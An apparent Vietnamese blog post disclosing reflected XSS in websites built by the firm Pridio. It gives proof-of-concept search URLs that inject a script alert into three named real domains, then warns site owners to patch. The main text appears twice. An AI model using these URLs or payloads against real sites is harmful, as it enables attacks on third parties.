hôm nay mình có mò ra một công ty thiết kế webiste mà có web toàn bộ đều lỗi XSS
"Pridio được thành lập bởi 1 nhóm trí thức nghiên cứu chuyên sâu về thị trường internet Việt Nam từ năm 2009. Chúng tôi cung cấp các giải pháp cũng như các dịch vụ trực tuyến với chất lượng cao và chi phí phù hợp cho khách hàng."
Exploit: Công ty Cổ Phần Pridio XSS Attack
Toàn bộ dự án website đã thực hiện các bạn có thể coi ở đây:
http://pridio.com/cac-du-an/
toàn bộ sản phẩm của công ty này đều bị lỗi XSS
check thử demo ảnh:
Links:
http://pridio.com/?s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
http://phuongvietgroup.com/?s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
http://clickbuy.com.vn/?s=%3Cscript%3Ealert%281%29;%3C/script%3E&asl_active=1
Cảnh báo:
Những ai đang dùng code của công ty này nhanh chóng sửa lại lỗi trên website và yêu cầu công ty này cung cấp bản vá vì đây là lỗi hệ thống
Đối với công ty chúng tôi yêu cầu rà soát lại toàn bộ code của mình và tiến hành chỉnh sửa lỗi hệ thống của công ty cũng như website khách hàng!!
"Pridio được thành lập bởi 1 nhóm trí thức nghiên cứu chuyên sâu về thị trường internet Việt Nam từ năm 2009. Chúng tôi cung cấp các giải pháp cũng như các dịch vụ trực tuyến với chất lượng cao và chi phí phù hợp cho khách hàng."
Exploit: Công ty Cổ Phần Pridio XSS Attack
Toàn bộ dự án website đã thực hiện các bạn có thể coi ở đây:
http://pridio.com/cac-du-an/
toàn bộ sản phẩm của công ty này đều bị lỗi XSS
check thử demo ảnh:
Links:
http://pridio.com/?s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
http://phuongvietgroup.com/?s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
http://clickbuy.com.vn/?s=%3Cscript%3Ealert%281%29;%3C/script%3E&asl_active=1
Cảnh báo:
Những ai đang dùng code của công ty này nhanh chóng sửa lại lỗi trên website và yêu cầu công ty này cung cấp bản vá vì đây là lỗi hệ thống
Đối với công ty chúng tôi yêu cầu rà soát lại toàn bộ code của mình và tiến hành chỉnh sửa lỗi hệ thống của công ty cũng như website khách hàng!!
0 Comments:
Đăng nhận xét